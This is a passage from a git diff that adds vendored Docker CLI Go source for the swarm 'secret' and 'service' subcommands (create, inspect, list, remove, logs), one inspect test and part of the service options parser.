createOpts.file = args[1] + return runSecretCreate(dockerCli, createOpts) + }, + } + flags := cmd.Flags() + flags.VarP(&createOpts.labels, "label", "l", "Secret labels") + + return cmd +} + +func runSecretCreate(dockerCli *command.DockerCli, options createOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + var in io.Reader = dockerCli.In() + if options.file != "-" { + file, err := system.OpenSequential(options.file) + if err != nil { + return err + } + in = file + defer file.Close() + } + + secretData, err := ioutil.ReadAll(in) + if err != nil { + return fmt.Errorf("Error reading content from %q: %v", options.file, err) + } + + spec := 
swarm.SecretSpec{ + Annotations: swarm.Annotations{ + Name: options.name, + Labels: runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()), + }, + Data: secretData, + } + + r, err := client.SecretCreate(ctx, spec) + if err != nil { + return err + } + + fmt.Fprintln(dockerCli.Out(), r.ID) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/secret/inspect.go b/vendor/github.com/docker/docker/cli/command/secret/inspect.go new file mode 100644 index 0000000000..0a8bd4a23f --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/inspect.go @@ -0,0 +1,45 @@ +package secret + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type inspectOptions struct { + names []string + format string +} + +func newSecretInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := inspectOptions{} + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] SECRET [SECRET...]", + Short: "Display detailed information on one or more secrets", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.names = args + return runSecretInspect(dockerCli, opts) + }, + } + + cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + return cmd +} + +func runSecretInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + ids, err := getCliRequestedSecretIDs(ctx, client, opts.names) + if err != nil { + return err + } + getRef := func(id string) (interface{}, []byte, error) { + return client.SecretInspectWithRaw(ctx, id) + } + + return inspect.Inspect(dockerCli.Out(), ids, opts.format, getRef) +} diff --git a/vendor/github.com/docker/docker/cli/command/secret/ls.go b/vendor/github.com/docker/docker/cli/command/secret/ls.go new file mode 100644 index 
0000000000..faeab314b7 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/ls.go @@ -0,0 +1,68 @@ +package secret + +import ( + "fmt" + "text/tabwriter" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/go-units" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type listOptions struct { + quiet bool +} + +func newSecretListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{} + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Aliases: []string{"list"}, + Short: "List secrets", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runSecretList(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") + + return cmd +} + +func runSecretList(dockerCli *command.DockerCli, opts listOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + secrets, err := client.SecretList(ctx, types.SecretListOptions{}) + if err != nil { + return err + } + + w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) + if opts.quiet { + for _, s := range secrets { + fmt.Fprintf(w, "%s\n", s.ID) + } + } else { + fmt.Fprintf(w, "ID\tNAME\tCREATED\tUPDATED") + fmt.Fprintf(w, "\n") + + for _, s := range secrets { + created := units.HumanDuration(time.Now().UTC().Sub(s.Meta.CreatedAt)) + " ago" + updated := units.HumanDuration(time.Now().UTC().Sub(s.Meta.UpdatedAt)) + " ago" + + fmt.Fprintf(w, "%s\t%s\t%s\t%s\n", s.ID, s.Spec.Annotations.Name, created, updated) + } + } + + w.Flush() + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/secret/remove.go b/vendor/github.com/docker/docker/cli/command/secret/remove.go new file mode 100644 index 0000000000..f45a619f6a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/remove.go @@ -0,0 +1,57 @@ +package secret + +import ( + "fmt" + 
"strings" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type removeOptions struct { + names []string +} + +func newSecretRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + return &cobra.Command{ + Use: "rm SECRET [SECRET...]", + Aliases: []string{"remove"}, + Short: "Remove one or more secrets", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts := removeOptions{ + names: args, + } + return runSecretRemove(dockerCli, opts) + }, + } +} + +func runSecretRemove(dockerCli *command.DockerCli, opts removeOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + ids, err := getCliRequestedSecretIDs(ctx, client, opts.names) + if err != nil { + return err + } + + var errs []string + + for _, id := range ids { + if err := client.SecretRemove(ctx, id); err != nil { + errs = append(errs, err.Error()) + continue + } + + fmt.Fprintln(dockerCli.Out(), id) + } + + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/secret/utils.go b/vendor/github.com/docker/docker/cli/command/secret/utils.go new file mode 100644 index 0000000000..11d31ffd16 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/utils.go @@ -0,0 +1,76 @@ +package secret + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "golang.org/x/net/context" +) + +// GetSecretsByNameOrIDPrefixes returns secrets given a list of ids or names +func GetSecretsByNameOrIDPrefixes(ctx context.Context, client client.APIClient, terms []string) ([]swarm.Secret, error) { + args := filters.NewArgs() + for _, n := range terms { + args.Add("names", n) + args.Add("id", n) + } + + return client.SecretList(ctx, 
types.SecretListOptions{ + Filters: args, + }) +} + +func getCliRequestedSecretIDs(ctx context.Context, client client.APIClient, terms []string) ([]string, error) { + secrets, err := GetSecretsByNameOrIDPrefixes(ctx, client, terms) + if err != nil { + return nil, err + } + + if len(secrets) > 0 { + found := make(map[string]struct{}) + next: + for _, term := range terms { + // attempt to lookup secret by full ID + for _, s := range secrets { + if s.ID == term { + found[s.ID] = struct{}{} + continue next + } + } + // attempt to lookup secret by full name + for _, s := range secrets { + if s.Spec.Annotations.Name == term { + found[s.ID] = struct{}{} + continue next + } + } + // attempt to lookup secret by partial ID (prefix) + // return error if more than one matches found (ambiguous) + n := 0 + for _, s := range secrets { + if strings.HasPrefix(s.ID, term) { + found[s.ID] = struct{}{} + n++ + } + } + if n > 1 { + return nil, fmt.Errorf("secret %s is ambiguous (%d matches found)", term, n) + } + } + + // We already collected all the IDs found. 
+ // Now we will remove duplicates by converting the map to slice + ids := []string{} + for id := range found { + ids = append(ids, id) + } + + return ids, nil + } + + return terms, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/cmd.go b/vendor/github.com/docker/docker/cli/command/service/cmd.go new file mode 100644 index 0000000000..796fe926c3 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/cmd.go @@ -0,0 +1,29 @@ +package service + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewServiceCommand returns a cobra command for `service` subcommands +func NewServiceCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "service", + Short: "Manage services", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + newCreateCommand(dockerCli), + newInspectCommand(dockerCli), + newPsCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + newScaleCommand(dockerCli), + newUpdateCommand(dockerCli), + newLogsCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/service/create.go b/vendor/github.com/docker/docker/cli/command/service/create.go new file mode 100644 index 0000000000..1355c19c65 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/create.go @@ -0,0 +1,100 @@ +package service + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := newServiceOptions() + + cmd := &cobra.Command{ + Use: "create [OPTIONS] IMAGE [COMMAND] [ARG...]", + Short: "Create a new service", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.image = args[0] + if len(args) > 1 { + 
opts.args = args[1:] + } + return runCreate(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.StringVar(&opts.mode, flagMode, "replicated", "Service mode (replicated or global)") + flags.StringVar(&opts.name, flagName, "", "Service name") + + addServiceFlags(cmd, opts) + + flags.VarP(&opts.labels, flagLabel, "l", "Service labels") + flags.Var(&opts.containerLabels, flagContainerLabel, "Container labels") + flags.VarP(&opts.env, flagEnv, "e", "Set environment variables") + flags.Var(&opts.envFile, flagEnvFile, "Read in a file of environment variables") + flags.Var(&opts.mounts, flagMount, "Attach a filesystem mount to the service") + flags.Var(&opts.constraints, flagConstraint, "Placement constraints") + flags.Var(&opts.networks, flagNetwork, "Network attachments") + flags.Var(&opts.secrets, flagSecret, "Specify secrets to expose to the service") + flags.VarP(&opts.endpoint.publishPorts, flagPublish, "p", "Publish a port as a node port") + flags.Var(&opts.groups, flagGroup, "Set one or more supplementary user groups for the container") + flags.Var(&opts.dns, flagDNS, "Set custom DNS servers") + flags.Var(&opts.dnsOption, flagDNSOption, "Set DNS options") + flags.Var(&opts.dnsSearch, flagDNSSearch, "Set custom DNS search domains") + flags.Var(&opts.hosts, flagHost, "Set one or more custom host-to-IP mappings (host:ip)") + + flags.SetInterspersed(false) + return cmd +} + +func runCreate(dockerCli *command.DockerCli, opts *serviceOptions) error { + apiClient := dockerCli.Client() + createOpts := types.ServiceCreateOptions{} + + service, err := opts.ToService() + if err != nil { + return err + } + + specifiedSecrets := opts.secrets.Value() + if len(specifiedSecrets) > 0 { + // parse and validate secrets + secrets, err := ParseSecrets(apiClient, specifiedSecrets) + if err != nil { + return err + } + service.TaskTemplate.ContainerSpec.Secrets = secrets + + } + + ctx := context.Background() + + if err := resolveServiceImageDigest(dockerCli, &service); err != nil { + 
return err + } + + // only send auth if flag was set + if opts.registryAuth { + // Retrieve encoded auth token from the image reference + encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, opts.image) + if err != nil { + return err + } + createOpts.EncodedRegistryAuth = encodedAuth + } + + response, err := apiClient.ServiceCreate(ctx, service, createOpts) + if err != nil { + return err + } + + for _, warning := range response.Warnings { + fmt.Fprintln(dockerCli.Err(), warning) + } + + fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect.go b/vendor/github.com/docker/docker/cli/command/service/inspect.go new file mode 100644 index 0000000000..deb701bf6d --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/inspect.go @@ -0,0 +1,84 @@ +package service + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + apiclient "github.com/docker/docker/client" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + refs []string + format string + pretty bool +} + +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] SERVICE [SERVICE...]", + Short: "Display detailed information on one or more services", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.refs = args + + if opts.pretty && len(opts.format) > 0 { + return fmt.Errorf("--format is incompatible with human friendly format") + } + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.") + return cmd +} + +func 
runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + if opts.pretty { + opts.format = "pretty" + } + + getRef := func(ref string) (interface{}, []byte, error) { + service, _, err := client.ServiceInspectWithRaw(ctx, ref) + if err == nil || !apiclient.IsErrServiceNotFound(err) { + return service, nil, err + } + return nil, nil, fmt.Errorf("Error: no such service: %s", ref) + } + + f := opts.format + if len(f) == 0 { + f = "raw" + if len(dockerCli.ConfigFile().ServiceInspectFormat) > 0 { + f = dockerCli.ConfigFile().ServiceInspectFormat + } + } + + // check if the user is trying to apply a template to the pretty format, which + // is not supported + if strings.HasPrefix(f, "pretty") && f != "pretty" { + return fmt.Errorf("Cannot supply extra formatting options to the pretty template") + } + + serviceCtx := formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewServiceFormat(f), + } + + if err := formatter.ServiceInspectWrite(serviceCtx, opts.refs, getRef); err != nil { + return cli.StatusError{StatusCode: 1, Status: err.Error()} + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect_test.go b/vendor/github.com/docker/docker/cli/command/service/inspect_test.go new file mode 100644 index 0000000000..04a65080c7 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/inspect_test.go @@ -0,0 +1,129 @@ +package service + +import ( + "bytes" + "encoding/json" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/pkg/testutil/assert" +) + +func formatServiceInspect(t *testing.T, format formatter.Format, now time.Time) string { + b := new(bytes.Buffer) + + endpointSpec := &swarm.EndpointSpec{ + Mode: "vip", + Ports: []swarm.PortConfig{ + { + Protocol: swarm.PortConfigProtocolTCP, + TargetPort: 5000, + }, + }, + } + + two := 
uint64(2) + + s := swarm.Service{ + ID: "de179gar9d0o7ltdybungplod", + Meta: swarm.Meta{ + Version: swarm.Version{Index: 315}, + CreatedAt: now, + UpdatedAt: now, + }, + Spec: swarm.ServiceSpec{ + Annotations: swarm.Annotations{ + Name: "my_service", + Labels: map[string]string{"com.label": "foo"}, + }, + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: "foo/bar@sha256:this_is_a_test", + }, + }, + Mode: swarm.ServiceMode{ + Replicated: &swarm.ReplicatedService{ + Replicas: &two, + }, + }, + UpdateConfig: nil, + Networks: []swarm.NetworkAttachmentConfig{ + { + Target: "5vpyomhb6ievnk0i0o60gcnei", + Aliases: []string{"web"}, + }, + }, + EndpointSpec: endpointSpec, + }, + Endpoint: swarm.Endpoint{ + Spec: *endpointSpec, + Ports: []swarm.PortConfig{ + { + Protocol: swarm.PortConfigProtocolTCP, + TargetPort: 5000, + PublishedPort: 30000, + }, + }, + VirtualIPs: []swarm.EndpointVirtualIP{ + { + NetworkID: "6o4107cj2jx9tihgb0jyts6pj", + Addr: "10.255.0.4/16", + }, + }, + }, + UpdateStatus: swarm.UpdateStatus{ + StartedAt: now, + CompletedAt: now, + }, + } + + ctx := formatter.Context{ + Output: b, + Format: format, + } + + err := formatter.ServiceInspectWrite(ctx, []string{"de179gar9d0o7ltdybungplod"}, func(ref string) (interface{}, []byte, error) { + return s, nil, nil + }) + if err != nil { + t.Fatal(err) + } + return b.String() +} + +func TestPrettyPrintWithNoUpdateConfig(t *testing.T) { + s := formatServiceInspect(t, formatter.NewServiceFormat("pretty"), time.Now()) + if strings.Contains(s, "UpdateStatus") { + t.Fatal("Pretty print failed before parsing UpdateStatus") + } +} + +func TestJSONFormatWithNoUpdateConfig(t *testing.T) { + now := time.Now() + // s1: [{"ID":..}] + // s2: {"ID":..} + s1 := formatServiceInspect(t, formatter.NewServiceFormat(""), now) + t.Log("// s1") + t.Logf("%s", s1) + s2 := formatServiceInspect(t, formatter.NewServiceFormat("{{json .}}"), now) + t.Log("// s2") + t.Logf("%s", s2) + var m1Wrap 
[]map[string]interface{} + if err := json.Unmarshal([]byte(s1), &m1Wrap); err != nil { + t.Fatal(err) + } + if len(m1Wrap) != 1 { + t.Fatalf("strange s1=%s", s1) + } + m1 := m1Wrap[0] + t.Logf("m1=%+v", m1) + var m2 map[string]interface{} + if err := json.Unmarshal([]byte(s2), &m2); err != nil { + t.Fatal(err) + } + t.Logf("m2=%+v", m2) + assert.DeepEqual(t, m2, m1) +} diff --git a/vendor/github.com/docker/docker/cli/command/service/list.go b/vendor/github.com/docker/docker/cli/command/service/list.go new file mode 100644 index 0000000000..724126079c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/list.go @@ -0,0 +1,158 @@ +package service + +import ( + "fmt" + "io" + "text/tabwriter" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/stringid" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +const ( + listItemFmt = "%s\t%s\t%s\t%s\t%s\n" +) + +type listOptions struct { + quiet bool + filter opts.FilterOpt +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Aliases: []string{"list"}, + Short: "List services", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + ctx := context.Background() + client := dockerCli.Client() + out := dockerCli.Out() + + services, err := client.ServiceList(ctx, 
types.ServiceListOptions{Filters: opts.filter.Value()}) + if err != nil { + return err + } + + if len(services) > 0 && !opts.quiet { + // only non-empty services and not quiet, should we call TaskList and NodeList api + taskFilter := filters.NewArgs() + for _, service := range services { + taskFilter.Add("service", service.ID) + } + + tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter}) + if err != nil { + return err + } + + nodes, err := client.NodeList(ctx, types.NodeListOptions{}) + if err != nil { + return err + } + + PrintNotQuiet(out, services, nodes, tasks) + } else if !opts.quiet { + // no services and not quiet, print only one line with columns ID, NAME, MODE, REPLICAS... + PrintNotQuiet(out, services, []swarm.Node{}, []swarm.Task{}) + } else { + PrintQuiet(out, services) + } + + return nil +} + +// PrintNotQuiet shows service list in a non-quiet way. +// Besides this, command `docker stack services xxx` will call this, too. +func PrintNotQuiet(out io.Writer, services []swarm.Service, nodes []swarm.Node, tasks []swarm.Task) { + activeNodes := make(map[string]struct{}) + for _, n := range nodes { + if n.Status.State != swarm.NodeStateDown { + activeNodes[n.ID] = struct{}{} + } + } + + running := map[string]int{} + tasksNoShutdown := map[string]int{} + + for _, task := range tasks { + if task.DesiredState != swarm.TaskStateShutdown { + tasksNoShutdown[task.ServiceID]++ + } + + if _, nodeActive := activeNodes[task.NodeID]; nodeActive && task.Status.State == swarm.TaskStateRunning { + running[task.ServiceID]++ + } + } + + printTable(out, services, running, tasksNoShutdown) +} + +func printTable(out io.Writer, services []swarm.Service, running, tasksNoShutdown map[string]int) { + writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0) + + // Ignore flushing errors + defer writer.Flush() + + fmt.Fprintf(writer, listItemFmt, "ID", "NAME", "MODE", "REPLICAS", "IMAGE") + + for _, service := range services { + mode := "" + replicas := "" + if 
service.Spec.Mode.Replicated != nil && service.Spec.Mode.Replicated.Replicas != nil { + mode = "replicated" + replicas = fmt.Sprintf("%d/%d", running[service.ID], *service.Spec.Mode.Replicated.Replicas) + } else if service.Spec.Mode.Global != nil { + mode = "global" + replicas = fmt.Sprintf("%d/%d", running[service.ID], tasksNoShutdown[service.ID]) + } + image := service.Spec.TaskTemplate.ContainerSpec.Image + ref, err := distreference.ParseNamed(image) + if err == nil { + // update image string for display + namedTagged, ok := ref.(distreference.NamedTagged) + if ok { + image = namedTagged.Name() + ":" + namedTagged.Tag() + } + } + + fmt.Fprintf( + writer, + listItemFmt, + stringid.TruncateID(service.ID), + service.Spec.Name, + mode, + replicas, + image) + } +} + +// PrintQuiet shows service list in a quiet way. +// Besides this, command `docker stack services xxx` will call this, too. +func PrintQuiet(out io.Writer, services []swarm.Service) { + for _, service := range services { + fmt.Fprintln(out, service.ID) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/service/logs.go b/vendor/github.com/docker/docker/cli/command/service/logs.go new file mode 100644 index 0000000000..19d3d9a488 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/logs.go @@ -0,0 +1,163 @@ +package service + +import ( + "bytes" + "fmt" + "io" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/idresolver" + "github.com/docker/docker/pkg/stdcopy" + "github.com/spf13/cobra" +) + +type logsOptions struct { + noResolve bool + follow bool + since string + timestamps bool + details bool + tail string + + service string +} + +func newLogsCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts logsOptions + + cmd := &cobra.Command{ + Use: "logs [OPTIONS] SERVICE", + 
Short: "Fetch the logs of a service", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.service = args[0] + return runLogs(dockerCli, &opts) + }, + Tags: map[string]string{"experimental": ""}, + } + + flags := cmd.Flags() + flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") + flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output") + flags.StringVar(&opts.since, "since", "", "Show logs since timestamp") + flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps") + flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs") + flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs") + return cmd +} + +func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error { + ctx := context.Background() + + options := types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Since: opts.since, + Timestamps: opts.timestamps, + Follow: opts.follow, + Tail: opts.tail, + Details: opts.details, + } + + client := dockerCli.Client() + responseBody, err := client.ServiceLogs(ctx, opts.service, options) + if err != nil { + return err + } + defer responseBody.Close() + + resolver := idresolver.New(client, opts.noResolve) + + stdout := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Out()} + stderr := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Err()} + + // TODO(aluzzardi): Do an io.Copy for services with TTY enabled. 
+ _, err = stdcopy.StdCopy(stdout, stderr, responseBody) + return err +} + +type logWriter struct { + ctx context.Context + opts *logsOptions + r *idresolver.IDResolver + w io.Writer +} + +func (lw *logWriter) Write(buf []byte) (int, error) { + contextIndex := 0 + numParts := 2 + if lw.opts.timestamps { + contextIndex++ + numParts++ + } + + parts := bytes.SplitN(buf, []byte(" "), numParts) + if len(parts) != numParts { + return 0, fmt.Errorf("invalid context in log message: %v", string(buf)) + } + + taskName, nodeName, err := lw.parseContext(string(parts[contextIndex])) + if err != nil { + return 0, err + } + + output := []byte{} + for i, part := range parts { + // First part doesn't get space separation. + if i > 0 { + output = append(output, []byte(" ")...) + } + + if i == contextIndex { + // TODO(aluzzardi): Consider constant padding. + output = append(output, []byte(fmt.Sprintf("%s@%s |", taskName, nodeName))...) + } else { + output = append(output, part...) + } + } + _, err = lw.w.Write(output) + if err != nil { + return 0, err + } + + return len(buf), nil +} + +func (lw *logWriter) parseContext(input string) (string, string, error) { + context := make(map[string]string) + + components := strings.Split(input, ",") + for _, component := range components { + parts := strings.SplitN(component, "=", 2) + if len(parts) != 2 { + return "", "", fmt.Errorf("invalid context: %s", input) + } + context[parts[0]] = parts[1] + } + + taskID, ok := context["com.docker.swarm.task.id"] + if !ok { + return "", "", fmt.Errorf("missing task id in context: %s", input) + } + taskName, err := lw.r.Resolve(lw.ctx, swarm.Task{}, taskID) + if err != nil { + return "", "", err + } + + nodeID, ok := context["com.docker.swarm.node.id"] + if !ok { + return "", "", fmt.Errorf("missing node id in context: %s", input) + } + nodeName, err := lw.r.Resolve(lw.ctx, swarm.Node{}, nodeID) + if err != nil { + return "", "", err + } + + return taskName, nodeName, nil +} diff --git 
a/vendor/github.com/docker/docker/cli/command/service/opts.go b/vendor/github.com/docker/docker/cli/command/service/opts.go new file mode 100644 index 0000000000..cbe544aacc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/opts.go @@ -0,0 +1,648 @@ +package service + +import ( + "encoding/csv" + "fmt" + "os" + "path/filepath" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" + units "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type int64Value interface { + Value() int64 +} + +type memBytes int64 + +func (m *memBytes) String() string { + return units.BytesSize(float64(m.Value())) +} + +func (m *memBytes) Set(value string) error { + val, err := units.RAMInBytes(value) + *m = memBytes(val) + return err +} + +func (m *memBytes) Type() string { + return "bytes" +} + +func (m *memBytes) Value() int64 { + return int64(*m) +} + +// PositiveDurationOpt is an option type for time.Duration that uses a pointer. +// It bahave similarly to DurationOpt but only allows positive duration values. +type PositiveDurationOpt struct { + DurationOpt +} + +// Set a new value on the option. Setting a negative duration value will cause +// an error to be returned. +func (d *PositiveDurationOpt) Set(s string) error { + err := d.DurationOpt.Set(s) + if err != nil { + return err + } + if *d.DurationOpt.value < 0 { + return fmt.Errorf("duration cannot be negative") + } + return nil +} + +// DurationOpt is an option type for time.Duration that uses a pointer. 
This +// allows us to get nil values outside, instead of defaulting to 0 +type DurationOpt struct { + value *time.Duration +} + +// Set a new value on the option +func (d *DurationOpt) Set(s string) error { + v, err := time.ParseDuration(s) + d.value = &v + return err +} + +// Type returns the type of this option, which will be displayed in `--help` output +func (d *DurationOpt) Type() string { + return "duration" +} + +// String returns a string repr of this option +func (d *DurationOpt) String() string { + if d.value != nil { + return d.value.String() + } + return "" +} + +// Value returns the time.Duration +func (d *DurationOpt) Value() *time.Duration { + return d.value +} + +// Uint64Opt represents a uint64. +type Uint64Opt struct { + value *uint64 +} + +// Set a new value on the option +func (i *Uint64Opt) Set(s string) error { + v, err := strconv.ParseUint(s, 0, 64) + i.value = &v + return err +} + +// Type returns the type of this option, which will be displayed in `--help` output +func (i *Uint64Opt) Type() string { + return "uint" +} + +// String returns a string repr of this option +func (i *Uint64Opt) String() string { + if i.value != nil { + return fmt.Sprintf("%v", *i.value) + } + return "" +} + +// Value returns the uint64 +func (i *Uint64Opt) Value() *uint64 { + return i.value +} + +type floatValue float32 + +func (f *floatValue) Set(s string) error { + v, err := strconv.ParseFloat(s, 32) + *f = floatValue(v) + return err +} + +func (f *floatValue) Type() string { + return "float" +} + +func (f *floatValue) String() string { + return strconv.FormatFloat(float64(*f), 'g', -1, 32) +} + +func (f *floatValue) Value() float32 { + return float32(*f) +} + +// SecretRequestSpec is a type for requesting secrets +type SecretRequestSpec struct { + source string + target string + uid string + gid string + mode os.FileMode +} + +// SecretOpt is a Value type for parsing secrets +type SecretOpt struct { + values []*SecretRequestSpec +} + +// Set a new secret value 
+func (o *SecretOpt) Set(value string) error { + csvReader := csv.NewReader(strings.NewReader(value)) + fields, err := csvReader.Read() + if err != nil { + return err + } + + spec := &SecretRequestSpec{ + source: "", + target: "", + uid: "0", + gid: "0", + mode: 0444, + } + + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + key := strings.ToLower(parts[0]) + + if len(parts) != 2 { + return fmt.Errorf("invalid field '%s' must be a key=value pair", field) + } + + value := parts[1] + switch key { + case "source", "src": + spec.source = value + case "target": + tDir, _ := filepath.Split(value) + if tDir != "" { + return fmt.Errorf("target must not have a path") + } + spec.target = value + case "uid": + spec.uid = value + case "gid": + spec.gid = value + case "mode": + m, err := strconv.ParseUint(value, 0, 32) + if err != nil { + return fmt.Errorf("invalid mode specified: %v", err) + } + + spec.mode = os.FileMode(m) + default: + return fmt.Errorf("invalid field in secret request: %s", key) + } + } + + if spec.source == "" { + return fmt.Errorf("source is required") + } + + o.values = append(o.values, spec) + return nil +} + +// Type returns the type of this option +func (o *SecretOpt) Type() string { + return "secret" +} + +// String returns a string repr of this option +func (o *SecretOpt) String() string { + secrets := []string{} + for _, secret := range o.values { + repr := fmt.Sprintf("%s -> %s", secret.source, secret.target) + secrets = append(secrets, repr) + } + return strings.Join(secrets, ", ") +} + +// Value returns the secret requests +func (o *SecretOpt) Value() []*SecretRequestSpec { + return o.values +} + +type updateOptions struct { + parallelism uint64 + delay time.Duration + monitor time.Duration + onFailure string + maxFailureRatio floatValue +} + +type resourceOptions struct { + limitCPU opts.NanoCPUs + limitMemBytes memBytes + resCPU opts.NanoCPUs + resMemBytes memBytes +} + +func (r *resourceOptions) ToResourceRequirements() 
